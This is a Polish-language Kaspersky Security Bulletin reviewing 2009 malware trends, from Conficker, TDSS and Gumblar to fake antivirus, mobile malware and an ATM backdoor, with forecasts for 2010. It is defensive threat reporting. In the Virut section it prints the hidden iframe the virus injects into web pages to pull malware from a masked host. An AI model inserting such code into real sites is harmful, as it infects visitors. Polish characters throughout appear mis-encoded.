Kaspersky Security Bulletin 2009. Ewolucja szkodliwego oprogramowania

  1. Kaspersky Security Bulletin 2009. Ewolucja szkodliwego oprogramowania
  2. Kaspersky Security Bulletin 2009. Statystyki
  3. Kaspersky Security Bulletin 2009: Ewolucja spamu

Trendy

Rok 2009 stanowi kamie艅 milowy zar贸wno w historii szkodliwego oprogramowania, jak i historii cyberprzest臋pczo艣ci - na obu obszarach nast膮pi艂a znacz膮ca zmiana kierunku. Ten rok stanowi fundament tego, czego mo偶emy spodziewa膰 si臋 w przysz艂o艣ci.

W latach 2007-2008 praktyka tworzenia niekomercyjnego szkodliwego oprogramowania niemal zanik艂a. G艂贸wnym rodzajem szkodliwego oprogramowania by艂 trojan kradn膮cy dane, a cyberprzest臋pcy byli szczeg贸lnie zainteresowani danymi nale偶膮cymi do os贸b graj膮cych w gry online - ich has艂ami, postaciami oraz przedmiotami.

W ci膮gu minionych 3-4 lat Chiny sta艂y si臋 najwi臋kszym 藕r贸d艂em szkodliwego oprogramowania. Chi艅scy cyberprzest臋pcy stworzyli tak du偶膮 liczb臋 szkodliwych program贸w, 偶e przez ostatnie 2 lata firmy antywirusowe, bez wyj膮tku, skoncentrowa艂y wi臋kszo艣膰 swoich wysi艂k贸w na zwalczanie chi艅skiego szkodliwego oprogramowania.

Statystyki tworzone przez r贸偶ne firmy r贸偶ni膮 si臋 (niekt贸re firmy licz膮 pliki, inne licz膮 liczb臋 sygnatur, jeszcze inne liczb臋 atak贸w), jednak wszystkie z nich odzwierciedlaj膮 gwa艂towny wzrost liczby szkodliwych program贸w w 2008 roku. O ile w ci膮gu 15 lat (od 1992 roku do 2007) Kaspersky Lab zidentyfikowa艂 ponad 2 miliony unikatowych szkodliwych program贸w, w przeci膮gu zaledwie jednego roku (2008) nasza firma zidentyfikowa艂a ponad 15 milion贸w unikatowych szkodliwych program贸w.

W 2009 roku liczba szkodliwych program贸w w kolekcji firmy Kaspersky Lab osi膮gn臋艂a 33,9 milion贸w.


Liczba szkodliwych program贸w w kolekcji Kaspersky Lab

W okresie 2007-2009 znacznie wzros艂a liczba nowych zagro偶e艅. Skutkiem by艂 wzrost wydajno艣ci centr贸w antywirusowych przetwarzaj膮cych zagro偶enia (oraz zwi膮zanych z tym technologii antywirusowych "w chmurze"); rozw贸j nowych technik automatycznego wykrywania; implementacja nowych metod heurystycznych, wirtualizacji i analizy zachowania. Innymi s艂owy, reakcj膮 bran偶y antywirusowej by艂o stworzenie nowych technologii maj膮cych na celu popraw臋 jako艣ci wykrywania. Mo偶na powiedzie膰, 偶e nast膮pi艂a rewolucja technologiczna w bran偶y. W 2009 roku standardowe rozwi膮zanie antywirusowe z lat 90 zesz艂ego stulecia (skaner i monitor) nie spe艂nia艂o ju偶 wymaga艅 rzeczywisto艣ci i zosta艂o zast膮pione rozwi膮zaniami 艂膮czonymi - produktami typu Internet Security, kt贸re integrowa艂y szeroki wachlarz technologii, w celu zaoferowania skuteczniejszej ochrony.

W okresie 2007 - 2008 liczba nowych zagro偶e艅 wzros艂a gwa艂townie. W 2009 roku zidentyfikowali艣my prawie tak膮 sam膮 liczb臋 szkodliwych program贸w co w 2008 roku - oko艂o 15 milion贸w.


Liczba nowych szkodliwych program贸w zidentyfikowanych w ci膮gu roku

Jest kilka powod贸w takiej sytuacji. Wzrost liczby szkodliwego oprogramowania z 2008 roku spowodowany by艂 nie tylko gwa艂town膮 ewolucj膮 w dziedzinie tworzenia wirus贸w w Chinach, ale r贸wnie偶 ewolucj膮 technologii infekowania plik贸w, kt贸ra doprowadzi艂a do wzrostu liczby unikatowych szkodliwych plik贸w. Pewn膮 rol臋 odegra艂o r贸wnie偶 po艂膮czenie wykorzystywanych wektor贸w atak贸w oraz zwrot w kierunku atak贸w na przegl膮darki internetowe.

Wszystkie te trendy by艂y widoczne r贸wnie偶 w 2009 roku, jednak nast膮pi艂o znacz膮ce spowolnienie wzrostu liczby szkodliwych program贸w. Co wi臋cej, nast膮pi艂 spadek aktywno艣ci trojan贸w, np. tych atakuj膮cych gry. Trend ten, kt贸ry przewidywali艣my to pod koniec 2008 roku, sta艂 si臋 wyra藕ny w po艂owie 2009 roku.

Powa偶na konkurencja na rynku, spadek zysk贸w cyberprzest臋pc贸w oraz wysi艂ki firm antywirusowych doprowadzi艂y do spadku liczby trojan贸w atakuj膮cych gry - trend ten zosta艂 dostrze偶ony przez innych producent贸w rozwi膮za艅 antywirusowych w po艂owie 2009 roku.

Do czynnik贸w, kt贸re doprowadzi艂y do tego spadku, nale偶a艂y dzia艂ania wydawc贸w gier, kt贸rzy zacz臋li reagowa膰 na problem bezpiecze艅stwa. Z drugiej strony r贸wnie偶 wielu graczy zacz臋艂o podejmowa膰 dzia艂ania w celu zabezpieczenia si臋 przed takimi zagro偶eniami.

W zmniejszeniu liczby szkodliwych program贸w pomog艂y r贸wnie偶 skuteczne przedsi臋wzi臋cia podejmowane przez organy 艣cigania i regulacyjne, firmy telekomunikacyjne i z bran偶y antywirusowej skierowane przeciwko nielegalnym firmom i serwisom oferuj膮cym hosting internetowy. Pierwszy krok zosta艂 podj臋ty w 2008 roku, gdy zamkni臋to takie serwisy jak McColo, Atrivo czy EstDomains. W 2009 roku podj臋to dalsze dzia艂ania, w wyniku kt贸rych UkrTeleGroup, RealHost oraz 3FN zosta艂y zmuszone do zaprzestania swojej dzia艂alno艣ci.

Firmy te znane by艂y z oferowania us艂ug dla wszelkiej ma艣ci spamer贸w i cyberprzest臋pc贸w, 艂膮cznie z dostarczaniem centr贸w kontroli botnet贸w, zasob贸w i stron phishingowych, exploit贸w itd.

Jednak zamkni臋cie przest臋pczych serwis贸w hostingowych nie po艂o偶y艂o kresu dzia艂alno艣ci przest臋pczej i spamerskiej, poniewa偶 cyberprzest臋pcy zdo艂ali znale藕膰 nowe zasoby. Mimo to w okresie, gdy tego rodzaju przest臋pcy byli zaj臋ci "przeprowadzk膮", Internet sta艂 si臋 bezpieczniejszy.

Obecnie wszystkie znaki wskazuj膮 na to, 偶e opisany wy偶ej trend utrzyma si臋 w 2010 roku, a liczba unikatowych szkodliwych program贸w stworzonych w 2010 roku b臋dzie podobna do tej z 2009 roku.

Podsumowanie roku

Rok 2009 charakteryzowa艂 si臋 z艂o偶onymi szkodliwymi programami z funkcjonalno艣ci膮 rootkita; globalnymi epidemiami; robakiem Kido (Conficker); atakami i botnetami sieciowymi; oszustwami SMS-owymi i atakami na portale spo艂eczno艣ciowe.

Wi臋ksze wyrafinowanie

W 2009 roku szkodliwe programy sta艂y si臋 znacznie bardziej z艂o偶one. Na przyk艂ad o ile w przesz艂o艣ci istnia艂a zaledwie garstka rodzin szkodliwego oprogramowania z funkcjonalno艣ci膮 rootkita, w 2009 roku programy tego rodzaju nie tylko sta艂y si臋 szeroko rozprzestrzenione, ale r贸wnie偶 znacznie bardziej wyrafinowane. Zagro偶enia, kt贸re zas艂uguj膮 na wzmiank臋 w tym kontek艣cie, to Sinowal (bootkit), TDSS oraz Clampi.

Analitycy z Kaspersky Lab 艣ledzili ewolucj臋 Sinowala przez dwa ostatnie lata; wiosn膮 2009 roku mia艂a miejsce ostatnia fala rozprzestrzeniania si臋 tego szkodliwego oprogramowania. Szkodniki te skutecznie zamaskowa艂y swoj膮 obecno艣膰 w systemie, a wi臋kszo艣膰 program贸w antywirusowych nie potrafi艂a ich wykry膰. W tym czasie bootkit by艂 najbardziej zaawansowanym szkodliwym programem. Co wi臋cej, Sinowal aktywnie zwalcza艂 wysi艂ki firm antywirusowych, kt贸re d膮偶y艂y do wyeliminowania centrum kontroli botnetu.

W wi臋kszo艣ci przypadk贸w bootkit rozprzestrzenia si臋 za po艣rednictwem zainfekowanych stron internetowych, portali oferuj膮cych materia艂y pornograficzne oraz strony zawieraj膮ce nielegalne oprogramowanie. Prawie wszystkie serwery, kt贸re zainfekowa艂y maszyny, by艂y cz臋艣ci膮 tak zwanych "program贸w afiliackich", w kt贸rych wsp贸艂pracowali ze sob膮 w艂a艣ciciele stron i autorzy szkodliwego oprogramowania. Tego rodzaju dzia艂ania s膮 bardzo popularne w rosyjskim i ukrai艅skim 艣wiecie cyberprzest臋pczym.

Inny szkodliwy program, TDSS, jednocze艣nie zaimplementowa艂 dwie niezwykle z艂o偶one technologie: infekuje sterowniki systemu Windows i tworzy sw贸j w艂asny wirtualny system plik贸w, w kt贸rym ukrywa sw贸j (szkodliwy) kod. TDSS by艂 pierwszym szkodliwym programem, kt贸ry potrafi艂 przenikn膮膰 do system na takim poziomie.

Clampi zosta艂 zauwa偶ony przez ekspert贸w ds. bezpiecze艅stwa latem 2009 roku, gdy zainfekowanych zosta艂o wiele du偶ych ameryka艅skich firm oraz organizacji rz膮dowych. Szkodnik ten, kt贸ry po raz pierwszy pojawi艂 si臋 w 2008 roku (a wed艂ug niekt贸rych danych, pochodzi艂 z Rosji), zosta艂 stworzony w celu kradzie偶y danych dotycz膮cych kont w okre艣lonych systemach bankowo艣ci online. Jego modyfikacja, kt贸ra pojawi艂a si臋 w 2009 roku, r贸偶ni艂a si臋 od poprzednich wariant贸w nie tylko swoj膮 wyrafinowan膮, wielomodu艂ow膮 struktur膮 (podobn膮 do tej zaimplementowanej w nies艂awnym trojanie Zbot), ale r贸wnie偶 wysoce z艂o偶on膮 struktur膮 komunikacji wykorzystywan膮 w stworzonym przez siebie botnecie, kt贸ry szyfrowa艂 ruch przy u偶yciu RSA. Inn膮 cech膮 charakterystyczn膮 Clampi by艂o wykorzystywanie standardowych narz臋dzi Windowsa podczas rozprzestrzeniania si臋 za po艣rednictwem sieci lokalnych. Spowodowa艂o to wiele problem贸w dla pewnych rozwi膮za艅 antywirusowych, kt贸re nie potrafi艂y zablokowa膰 "aplikacji z bia艂ych list", a tym samym nie by艂y w stanie odeprze膰 tego ataku.

Zagro偶enia te by艂y r贸wnie偶 znane z ich szerokiego rozpowszechnienia w Internecie. Zar贸wno Sinowal jak i Clampi spowodowa艂y epidemie na poziomie globalnym, a TDSS by艂 odpowiedzialny za jedn膮 z najwi臋kszych epidemii w 2009 roku. Packed.Win32.Tdss.z, kt贸ry pojawi艂 si臋 we wrze艣niu i zosta艂 nazwany przez jego autora "TDL 3", by艂 szczeg贸lnie szeroko rozpowszechniony.

Epidemie

W zesz艂ym roku przewidywali艣my wzrost globalnych epidemii, niestety nasze prognozy okaza艂y si臋 s艂uszne. Globalne epidemie by艂y spowodowane nie tylko wymienionymi wy偶ej zagro偶eniami, ale ca艂ym szeregiem innych szkodliwych program贸w.

Ataki na komputery

Dane zebrane przez Kaspersky Security Network pokazuj膮, 偶e ponad milion system贸w zosta艂o zaatakowanych przez wymienione ni偶ej szkodliwe programy:

  • Kido - robak
  • Sality - wirus/ robak
  • Brontok - robak
  • Mabezat - robak
  • Parite.b - wirus plikowy
  • Virut.ce - wirus/ bot
  • Sohanad - robak
  • TDSS.z - rootkit/backdoor

Bez w膮tpienia, najwi臋ksza epidemia roku by艂a wywo艂ana przez robaka Conficker (znany r贸wnie偶 jako Kido), kt贸ry zainfekowa艂 miliony maszyn na ca艂ym 艣wiecie. Szkodnik ten przenika艂 maszyny swoich ofiar na kilka sposob贸w: 艂ami膮c has艂a sieciowe za pomoc膮 ataku brute-force, za po艣rednictwem USB oraz wykorzystuj膮c luk臋 w zabezpieczeniach Windows MS08-067. Ka偶da zainfekowana maszyna stawa艂a si臋 nast臋pnie cz臋艣ci膮 botnetu. Zwalczanie botnetu utrudnia艂 fakt, 偶e Kido implementowa艂 najnowsze, najbardziej wyrafinowane technologie tworzenia wirus贸w. Na przyk艂ad, jedna z modyfikacji robaka zosta艂a tak zaprogramowana, 偶eby aktualizowa艂a si臋 z 500 domen; adresy tych domen zosta艂y losowo wybrane z listy 50 000 adres贸w, kt贸ra by艂a generowana ka偶dego dnia. Jako dodatkowy kana艂 aktualizacji zosta艂y wykorzystane po艂膮czenia przypominaj膮ce P2P. Kido uniemo偶liwia艂 r贸wnie偶 aktualizowanie rozwi膮za艅 bezpiecze艅stwa, wy艂膮cza艂 us艂ugi bezpiecze艅stwa i blokowa艂 dost臋p do stron producent贸w antywirusowych.

Tw贸rcy Kido byli stosunkowo spokojni a偶 do marca 2009 roku. Szacujemy jednak, 偶e do tego czasu zdo艂ali zainfekowa膰 5 milion贸w komputer贸w na ca艂ym 艣wiecie. Mimo 偶e Kido nie rozprzestrzenia艂 si臋 poprzez spam i nie przeprowadza艂 atak贸w DoS, badacze spodziewali si臋, 偶e nast膮pi to 1 kwietnia, poniewa偶 celem wersji Kido, kt贸ra zacz臋艂a rozprzestrzenia膰 si臋 w marcu, by艂o rozpocz臋cie pobierania dodatkowych modu艂贸w na pocz膮tku kwietnia. Jednak tw贸rcy Kido czekali i w nocy z 8 na 9 kwietnia zainfekowanym maszynom wydano polecenie aktualizacji szkodnika za po艣rednictwem P2P. Poza aktualizacjami Kido zainfekowane maszyny pobiera艂y dwa dodatkowe programy: wersj臋 robaka Email-Worm.Win32.Iksmas, kt贸ry rozsy艂a spam, oraz wersj臋 narz臋dzia FraudTool.Win32.SpywareProtect2009, fa艂szywego programu antywirusowego, kt贸ry 偶膮da pieni臋dzy w zamian za usuni臋cie zagro偶e艅, kt贸re rzekomo zosta艂y wykryte na komputerze.

W celu zwalczania tak szeroko rozpowszechnionego zagro偶enia stworzono specjaln膮 grup臋 Conficker Working Group. Grupa ta skupia艂a firmy antywirusowe, dostawc贸w Internetu, niezale偶ne organizacje badawcze, instytucje edukacyjne oraz regulacyjne. Grupa ta by艂a pierwszym przyk艂adem powa偶nej mi臋dzynarodowej wsp贸艂pracy, kt贸ra wykracza艂a poza granice codziennej komunikacji specjalist贸w zajmuj膮cych si臋 zwalczaniem wirus贸w. Mog艂aby stanowi膰 model interakcji organizacji z ca艂ego 艣wiata maj膮cej na celu zwalczanie globalnych zagro偶e艅.

Epidemia robaka Kido (Conficker) trwa艂a przez ca艂y rok 2009, a w listopadzie liczba zainfekowanych maszyn przekroczy艂a 7 milion贸w.

 

Epidemia wywo艂ana przez robaka Kido. 殴r贸d艂o: www.shadowserver.org

Nasze do艣wiadczenia zwi膮zane z epidemiami spowodowanymi przez inne robaki (Lovesan, Sasser, Slammer) sugeruj膮, 偶e w 2010 roku rozpowszechnienie robaka Kido nadal b臋dzie mia艂o rozmiary epidemii.

Warto wspomnie膰 o epidemii spowodowanej przez Viruta. Virus.Win32.Virut.ce wyr贸偶nia si臋 tym, 偶e atakuje us艂ugi sieciowe. Na uwag臋 zas艂uguj膮 r贸wnie偶 jego metody infekcji: szkodnik ten nie tylko infekuje pliki wykonywalne z rozszerzeniem .EXE i .SCR, ale r贸wnie偶 dodaje specjalnie stworzony kod na koniec plik贸w z rozszerzeniem .HTM, .PHP oraz .ASP w postaci odsy艂acza, na przyk艂ad <iframe src="http://ntkr(xxx).info/cr/?i=1" width=1 height=1></ iframe>

Podczas gdy u偶ytkownik przegl膮da legaln膮 (niezainfekowan膮) stron臋, na jego komputer pobierana jest szkodliwa zawarto艣膰 zlokalizowana w odsy艂aczu. Wirus rozprzestrzenia si臋 r贸wnie偶 za po艣rednictwem sieci P2P wraz z zainfekowanymi generatorami kluczy oraz dystrybucjami popularnego oprogramowania. Celem jest po艂膮czenie zainfekowanych komputer贸w w botnet IRC, kt贸ry jest wykorzystywany do rozsy艂ania spamu.

Zainfekowane zasoby sieciowe

Jedna z najwi臋kszych epidemii w Internecie, kt贸ra dotkn臋艂a dziesi膮tki tysi臋cy zasob贸w, by艂a spowodowana kilkoma falami infekcji Gumblara. Zacz臋艂o si臋 od zainfekowania skryptem legalnych stron internetowych. Skrypt ten ukradkiem przekierowywa艂 偶膮dania do stron cyberprzest臋pczych stworzonych w celu rozprzestrzeniania szkodliwego oprogramowania.

Szkodnik ten zosta艂 nazwany Gumblar od nazwy szkodliwej strony wykorzystanej w pierwszym ataku, do kt贸rej zostali przekierowani u偶ytkownicy przegl膮daj膮cy zainfekowane zasoby. Nast臋pnie strona ta infekowa艂a komputery. Ataki te stanowi艂y doskona艂y przyk艂ad sposobu dzia艂ania Malware 2.5 (temat ten zosta艂 podj臋ty w Kaspersky Security Bulletin: Ewolucja szkodliwego oprogramowania 2008, kt贸ry zosta艂 opublikowany na pocz膮tku zesz艂ego roku).

Jesieni膮 odsy艂acze, kt贸re zosta艂y umieszczone na skompromitowanych stronach, nie prowadzi艂y ju偶 do stron cyberprzest臋pczych, ale do legalnych, zainfekowanych stron; znacznie utrudni艂o to zwalczanie epidemii Gumblara.

W jaki spos贸b Gumblar rozprzestrzenia艂 si臋 tak szybko? Odpowied藕 jest prosta: Gumblar to w pe艂ni zautomatyzowany system. Specjali艣ci zajmuj膮cy si臋 zwalczaniem wirus贸w maj膮 do czynienia z now膮 generacj膮 samodzielnie rozbudowuj膮cych si臋 botnet贸w. System ma charakter cykliczny: osoby odwiedzaj膮ce skompromitowane strony s膮 aktywnie atakowane, nast臋pnie, po zainfekowaniu komputer贸w przy u偶yciu plik贸w wykonywalnych Windowsa, zostaj膮 skradzione dane dost臋pu do konta FTP. Konta te s膮 nast臋pnie wykorzystywane do infekowania wszystkich stron na nowych (wcze艣niej niezainfekowanych) serwerach sieciowych. W ten spos贸b zwi臋ksza si臋 liczba zainfekowanych stron, a w rezultacie zostaje zainfekowanych coraz wi臋cej komputer贸w. Ca艂y proces jest zautomatyzowany, a w艂a艣ciciele systemu musz膮 tylko aktualizowa膰 wykonywalny plik trojana, kt贸ry kradnie has艂a oraz exploity wykorzystywane do przeprowadzania atak贸w na przegl膮darki.

Oszustwa

Oszustwa wyst臋puj膮ce w Internecie staj膮 si臋 coraz bardziej zr贸偶nicowane. Opr贸cz powszechnych atak贸w phishingowych wyst臋puj膮 obecnie strony oferuj膮ce dost臋p do szeregu p艂atnych us艂ug. (Naturalnie w rzeczywisto艣ci us艂ugi nigdy nie s膮 dostarczane.) Liderem pod tym wzgl臋dem jest Rosja. To w艂a艣nie rosyjscy oszu艣ci stworzyli szeroki wachlarz stron oferuj膮cych "us艂ugi", takie jak "zlokalizuj osob臋 za po艣rednictwem GSM", "czytaj prywatne wiadomo艣ci na portalach spo艂eczno艣ciowych", "gromad藕 informacje" itd. Aby skorzysta膰 z takiej "us艂ugi", u偶ytkownik musi wys艂a膰 SMS na numer o podwy偶szonej op艂acie, nikt jednak nie informuje go, 偶e SMS mo偶e kosztowa膰 nawet do 10 dolar贸w. Alternatywnie, u偶ytkownikowi proponuje si臋 "subskrypcj臋", tak偶e przez SMS, a po dokonaniu subskrypcji op艂ata jest pobierana codziennie z jego konta mobilnego.

Zidentyfikowano kilkaset takich "us艂ug", wspieranych przez kilkadziesi膮t program贸w afiliackich. "Us艂ugi" te by艂y promowane przy pomocy tradycyjnego spamu rozsy艂anego za po艣rednictwem poczty elektronicznej, spamu na portalach spo艂eczno艣ciowych oraz rozsy艂anego poprzez komunikatory internetowe. W celu przeprowadzenia przysz艂ych atak贸w spamowych cyberprzest臋pcy wykorzystali nast臋pnie szkodliwe oprogramowanie oraz ataki phishingowe maj膮ce na celu uzyskanie dost臋pu do konta u偶ytkownik贸w, stworzyli dziesi膮tki fa艂szywych portali spo艂eczno艣ciowych itd. Dopiero pod koniec 2009 roku dostawcy us艂ug mobilnych, administratorzy porali spo艂eczno艣ciowych oraz bran偶a antywirusowa zacz臋li skutecznie zwalcza膰 tego typu aktywno艣膰 cyberprzest臋pcz膮.

Jak ju偶 wspomniano, cz臋艣ci膮 szkodliwej funkcji robaka Kido jest pobieranie na komputery ofiary fa艂szywego rozwi膮zania antywirusowego. Fa艂szywe rozwi膮zania antywirusowe pr贸buj膮 przekona膰 u偶ytkownika, 偶e na jego komputerze znajduj膮 si臋 zagro偶enia (mimo 偶e w rzeczywisto艣ci nie jest to prawd膮) oraz nak艂oni膰 go do "aktywowania" go (za co musi zap艂aci膰). Im bardziej takie fa艂szywe rozwi膮zania przypominaj膮 prawdziwe oprogramowanie, tym wi臋ksze szanse, 偶e ofiara zap艂aci.

W 2009 roku oszu艣ci i cyberprzest臋pcy coraz cz臋艣ciej wykorzystywali fa艂szywe rozwi膮zania antywirusowe. Fa艂szywe oprogramowanie jest rozprzestrzeniane nie tylko przy u偶yciu innych szkodliwych program贸w, ale r贸wnie偶 poprzez reklamy internetowe. Obecnie spora liczba stron wy艣wietla banery promuj膮ce nowy "cudowny" produkt, kt贸ry ma by膰 lekarstwem na wszystko. Nawet legalne strony cz臋sto pokazuj膮 takie banery flashowe lub natarczywe reklamy we flashu takich "nowych produkt贸w antywirusowych". Podobnie cz臋sto mo偶na si臋 natkn膮膰 na okienka wyskakuj膮ce, kt贸re oferuj膮 mo偶liwo艣膰 pobrania takich rozwi膮za艅 za darmo.

Fa艂szywe rozwi膮zania antywirusowe pojawi艂y si臋, a nast臋pnie rozpowszechni艂y dzi臋ki temu, 偶e mo偶na je 艂atwo stworzy膰, istnieje ju偶 dojrza艂y system dystrybucji i mog膮 by膰 wykorzystywane do osi膮gni臋cia du偶ych zysk贸w w kr贸tkim czasie. W listopadzie 2009 roku FBI oszacowa艂o, 偶e przy pomocy fa艂szywych rozwi膮za艅 antywirusowych cyberprzest臋pcy zdo艂ali zarobi膰 艣rednio 150 milion贸w dolar贸w (www.scmagazineus.com).

Kolekcja firmy Kaspersky Lab zawiera obecnie ponad 300 rodzin fa艂szywego oprogramowania antywirusowego.

Szkodliwe oprogramowanie dla alternatywnych platform i urz膮dze艅

W 2009 roku cyberprzest臋pcy nadal badali mo偶liwo艣ci oferowane przez alternatywne platformy, takie jak Mac OS oraz mobilne systemy operacyjne. Sam Apple podj膮艂 dzia艂ania zmierzaj膮ce do wyeliminowania problemu szkodliwego oprogramowania atakuj膮cego komputery Mac, integruj膮c skaner antywirusowy w najnowszej wersji swojego systemu operacyjnego - wcze艣niej firma twierdzi艂a, 偶e szkodliwe oprogramowanie nie stanowi zagro偶enia dla systemu Mac OS. Jednak w obszarze mobilnych system贸w operacyjnych sytuacja pozostaje niejasna. Z jednej strony, w 2009 roku nast膮pi艂o to, co przewidywano od dawna: pojawi艂 si臋 pierwszy szkodnik dla iPhone'a w postaci robaka Ike, zosta艂 stworzony pierwszy program spyware atakuj膮cy Androida oraz zidentyfikowano pierwszego podpisanego cyfrowo szkodnika dla smartfon贸w z Symbianem. Z drugiej strony, nadal istnieje rywalizacja o udzia艂 w rynku mobilnych system贸w operacyjnych, co oznacza, 偶e tw贸rcy wirus贸w nie potrafi膮 skoncentrowa膰 swoich wysi艂k贸w na jednej platformie.

W 2009 roku zidentyfikowano 39 nowych rodzin mobilnego szkodliwego oprogramowania oraz 257 nowych wariant贸w mobilnych szkodnik贸w. Dla por贸wnania, w 2008 roku zidentyfikowano 30 nowych rodzin i 143 nowych modyfikacji. Wykres poni偶ej pokazuje rozk艂ad wed艂ug miesi膮ca:


Nowe modyfikacje mobilnego szkodliwego oprogramowania w poszczeg贸lnych miesi膮cach (2008-2009)

Najwa偶niejsze wydarzenia dotycz膮ce mobilnego szkodliwego oprogramowania zosta艂y opisane w artykule Ewolucja mobilnego szkodliwego oprogramowania: Przegl膮d, Cz臋艣膰 3. Warto zwr贸ci膰 uwag臋 na nast臋puj膮ce wydarzenia i trendy 2009 roku:

  • mobilne szkodliwe programy s膮 ju偶 tworzone z my艣l膮 o zarabianiu pieni臋dzy
  • pojawi艂y si臋 podpisane szkodliwe programy dla systemu Symbian S60 (3rd Edition)
  • szereg r贸偶nych oszustw za po艣rednictwem SMS
  • pojawienie si臋 szkodliwych program贸w stworzonych w celu zarabiania pieni臋dzy, potrafi膮cych kontaktowa膰 si臋 ze zdalnymi serwerami cyberprzest臋pc贸w

Do pojawienia si臋 tego rodzaju program贸w przyczyni艂a si臋 popularno艣膰 sieci WiFi oraz dost臋pno艣膰 tanich us艂ug Internetu mobilnego: oba te czynniki pozwalaj膮 w艂a艣cicielom telefon贸w kom贸rkowych oraz smartfon贸w znacznie cz臋艣ciej korzysta膰 z Internetu. Najwa偶niejszym wydarzeniem drugiej po艂owy 2009 roku dotycz膮cym mobilnego szkodliwego oprogramowania by艂o prawdopodobnie pojawienie si臋 szkodliwego oprogramowania potrafi膮cego kontaktowa膰 si臋 ze zdalnymi serwerami.

Szkodliwe oprogramowanie, kt贸re potrafi kontaktowa膰 si臋 ze zdalnymi serwerami, otworzy艂o przed cyberprzest臋pcami nowe mo偶liwo艣ci.

  1. Trojany SMS, kt贸re wysy艂aj膮 wiadomo艣ci SMS na numery o podwy偶szonej op艂acie, potrafi膮 uzyska膰 parametry wiadomo艣ci ze zdalnego serwera. Je偶eli okre艣lony prefiks zostanie zablokowany, cyberprzest臋pcy nie b臋d膮 musieli wykorzystywa膰 innego szkodliwego programu, a jedynie zmieni膰 prefiks na serwerze.
  2. Szkodliwe oprogramowanie zainstalowane na urz膮dzeniach mobilnych mo偶e zosta膰 uaktualnione ze zdalnego serwera.
  3. Mobilne szkodliwe oprogramowanie, kt贸re potrafi po艂膮czy膰 si臋 ze zdalnym serwerem, mo偶e by膰 pierwszym krokiem w kierunku stworzenia botnet贸w sk艂adaj膮cych si臋 z zainfekowanych urz膮dze艅 mobilnych.

Trendy te prawdopodobnie utrzymaj膮 si臋 do 2010 roku, a bran偶a antywirusowa b臋dzie musia艂a zmierzy膰 si臋 z du偶膮 liczb膮 szkodliwych program贸w dla urz膮dze艅 mobilnych, kt贸re b臋d膮 艂膮czy艂y si臋 z Internetem w celu dostarczenia swojej szkodliwej funkcji.

Pojawienie si臋 programu Backdoor.Win32.Skimer by艂o unikatowym wydarzeniem w 2009 roku. Mimo 偶e incydent wywo艂any tym szkodliwym oprogramowaniem w rzeczywisto艣ci mia艂 miejsce pod koniec 2008 roku, zosta艂 szeroko nag艂o艣niony wiosn膮 2009 roku. Skimer by艂 pierwszym szkodliwym programem, kt贸ry atakowa艂 bankomaty. Po zainfekowaniu bankomatu przy pomocy specjalnej karty dost臋pu cyberprzest臋pcy mogli wykonywa膰 wiele nielegalnych dzia艂a艅: wyci膮gn膮膰 wszystkie 艣rodki z bankomatu lub uzyska膰 dane z kart wykorzystywanych w bankomacie. Analiza programu pokaza艂a, 偶e program mia艂 na celu atakowanie bankomat贸w w Rosji i na Ukrainie, poniewa偶 艣ledzi艂 transakcje w dolarach ameryka艅skich, rosyjskich rublach oraz ukrai艅skich hrywnach.

Szkodliwy program m贸g艂 przedosta膰 si臋 do bankomatu na dwa sposoby: poprzez fizyczny dost臋p do systemu bankomatu lub poprzez wewn臋trzn膮 sie膰 banku. Standardowe rozwi膮zanie antywirusowe potrafi zwalcza膰 takie zagro偶enia. Banki powinny przeprowadzi膰 skanowanie antywirusowe sieci bankomat贸w.

Prognozy

W 2010 roku najprawdopodobniej pojawi膮 si臋 nast臋puj膮ce problemy i zdarzenia:

Nast膮pi zmiana wykorzystywanych wektor贸w atak贸w - odej艣cie od sieci Web na rzecz sieci wymiany plik贸w. Jest to ostatni krok w 艂a艅cuchu ewolucyjnym: w latach 2000 - 2005 ataki by艂y przeprowadzane za po艣rednictwem poczty elektronicznej; w latach 2005 - 2006 g艂贸wnym wektorem atak贸w by艂 Internet; w latach 2006 - 2009 ataki by艂y przeprowadzane za po艣rednictwem stron internetowych (艂膮cznie z portalami spo艂eczno艣ciowymi). W 2009 roku masowe epidemie by艂y spowodowane szkodliwymi plikami rozprzestrzenianymi za po艣rednictwem stron torentowych. W ten spos贸b rozprzestrzeniane by艂y nie tylko tak dobrze znane zagro偶enia, jak TDSS czy Virut, ale r贸wnie偶 pierwsze backdoory dla Mac OS. W 2010 roku przewidujemy znaczny wzrost liczby incydent贸w z udzia艂em sieci P2P.

  1. Wojna o ruch. Cyberprzest臋pcy podejmuj膮 coraz wi臋cej dzia艂a艅, aby zalegalizowa膰 sw贸j biznes, a Internet oferuje wiele mo偶liwo艣ci zarobienia pieni臋dzy poprzez stworzenie du偶ych ilo艣ci ruchu ukierunkowanego. Taki ruch mo偶na wygenerowa膰 przy u偶yciu botnet贸w. O ile obecnie w wojnie o ruch botnetowy uczestnicz膮 tylko grupy przest臋pcze, wydaje si臋 prawdopodobne, 偶e w przysz艂o艣ci na takim rynku pojawi膮 si臋 "szare" us艂ugi. Tak zwane "programy stowarzyszone" pozwalaj膮 w艂a艣cicielom botnet贸w up艂ynni膰 swoje aktywa, nawet je偶eli nie s膮 oferowane takie us艂ugi przest臋pcze, jak spam, ataki DoS czy rozprzestrzenianie szkodliwego oprogramowania.
  2. Epidemie. Podobnie jak wcze艣niej, g艂贸wn膮 przyczyn膮 epidemii b臋dzie identyfikowanie luk w zabezpieczeniach. Dotyczy to zar贸wno oprogramowania producent贸w innych ni偶 Microsoft (Adobe, Apple), jak r贸wnie偶 wydanego niedawno systemu Windows 7. Warto zauwa偶y膰, 偶e producenci inni ni偶 Microsoft zacz臋li ostatnio wk艂ada膰 wi臋cej wysi艂ku w identyfikowanie b艂臋d贸w w swoich produktach. Je偶eli nie zostan膮 zidentyfikowane powa偶ne luki w zabezpieczeniach, pod wzgl臋dem bezpiecze艅stwa rok 2010 b臋dzie jednym z najspokojniejszych lat w najnowszej historii.
  3. Szkodliwe oprogramowanie b臋dzie coraz bardziej z艂o偶one. Obecnie istniej膮 zagro偶enia, kt贸re wykorzystuj膮 wsp贸艂czesne techniki infekowania plik贸w oraz funkcjonalno艣膰 rootkita. Wiele rozwi膮za艅 antywirusowych nie potrafi wyleczy膰 system贸w zainfekowanych takim szkodliwym oprogramowaniem. Z jednej strony, technologie antywirusowe b臋d膮 rozwijane w taki spos贸b, aby przede wszystkim uniemo偶liwi膰 zagro偶eniom przenikni臋cie do systemu; z drugiej strony, zagro偶enia, kt贸re potrafi膮 obej艣膰 rozwi膮zania bezpiecze艅stwa, b臋d膮 prawie niezniszczalne.
